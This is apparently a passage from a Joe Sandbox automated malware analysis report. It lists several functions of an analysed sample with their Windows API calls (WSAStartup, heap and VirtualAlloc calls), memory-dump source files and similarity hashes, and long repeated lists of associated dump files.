                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: BlanketProxy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3890896728-0
                                                                                                                                                                                                                                    • Opcode ID: d98eb6917e3e999d75c5b6f2f262c9ce68935c11b7e8b404c2466a9e617f1178
                                                                                                                                                                                                                                    • Instruction ID: cd7e8e7e8130adb1529c3cd1571839ffc5ec1c492ca90d7b438fa450449222ef
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d98eb6917e3e999d75c5b6f2f262c9ce68935c11b7e8b404c2466a9e617f1178
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2F07A745083418FD314DF24C5A871BBBE0BB84308F00891DE5998B390C7B59549CF82
                                                                                                                                                                                                                                    Function 00C49EB7 Relevance: 1.5, APIs: 1, Instructions: 18networkCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • WSAStartup.WS2_32(00000202,?), ref: 00C49ED2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367306642.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367327537.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367477803.0000000000E20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367495237.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367512455.0000000000E2E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367528405.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367546835.0000000000E36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Startup
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 724789610-0
                                                                                                                                                                                                                                    • Opcode ID: fd7e634f11a28daabc9b3537296c80c64402d91f5129040d0f74c2fee1c5dd16
                                                                                                                                                                                                                                    • Instruction ID: 16f0e2980a6cac58f8af72d9779b137ad1f63dbffe0f86baf77d449a20da3a97
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd7e634f11a28daabc9b3537296c80c64402d91f5129040d0f74c2fee1c5dd16
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BFE02B336406029BE700DB30FC47F8D3356DB15342705C42DE109C2072EAB294209B10
                                                                                                                                                                                                                                    Function 00C7C570 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?,00C7E0F9), ref: 00C7C590
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367306642.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367327537.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367477803.0000000000E20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367495237.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367512455.0000000000E2E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367528405.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367546835.0000000000E36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                                                                                    • Opcode ID: feb245825f8e499490edfd3d700a6ee50b551efd4945eea7caeb5c1f69bab145
                                                                                                                                                                                                                                    • Instruction ID: c13878b9f3c7d9fc03b8a5dc46285a9de45e142af928b3c9c2c5a1a04be02f8f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: feb245825f8e499490edfd3d700a6ee50b551efd4945eea7caeb5c1f69bab145
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12D01232415132FBCA506F28BC06BDB3B54DF49321F074891F5446A474D735EC91DAD4
                                                                                                                                                                                                                                    Function 00C7C55C Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(?,00000000), ref: 00C7C561
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367306642.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367327537.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367477803.0000000000E20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367495237.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367512455.0000000000E2E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367528405.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367546835.0000000000E36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                    • Opcode ID: 92ea219b9e3ffca40b26936556323fc0e27c48b6ba1c74ca7ff5741826dd8584
                                                                                                                                                                                                                                    • Instruction ID: bc431d8eeb212588d788f5ce5cf9f52fe13533dd669941e2da11921935a8e667
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92ea219b9e3ffca40b26936556323fc0e27c48b6ba1c74ca7ff5741826dd8584
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22A00171184150AADA562B24BC09BC87A21AB58621F124192F141994B6866198929A84
                                                                                                                                                                                                                                    Function 00C99840 Relevance: 1.3, APIs: 1, Instructions: 34memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000), ref: 00C99EC7
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367306642.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367327537.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367477803.0000000000E20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367495237.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367512455.0000000000E2E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367528405.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367546835.0000000000E36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                                                                    • Opcode ID: 665669b4b81937127b290555bb1e5be54b398af90a618f353bfc008e87b4d7e2
                                                                                                                                                                                                                                    • Instruction ID: d0b0b908d196872323bff84d6428999eaf199998a69815f768a94e3ab3c0457d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 665669b4b81937127b290555bb1e5be54b398af90a618f353bfc008e87b4d7e2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0BF030B121C700DFDB045F269885A7EBBE4FB44310F61042EE6C986790DB7158809A57
                                                                                                                                                                                                                                    Function 00C995B8 Relevance: 1.3, APIs: 1, Instructions: 11memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000), ref: 00C99C34
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
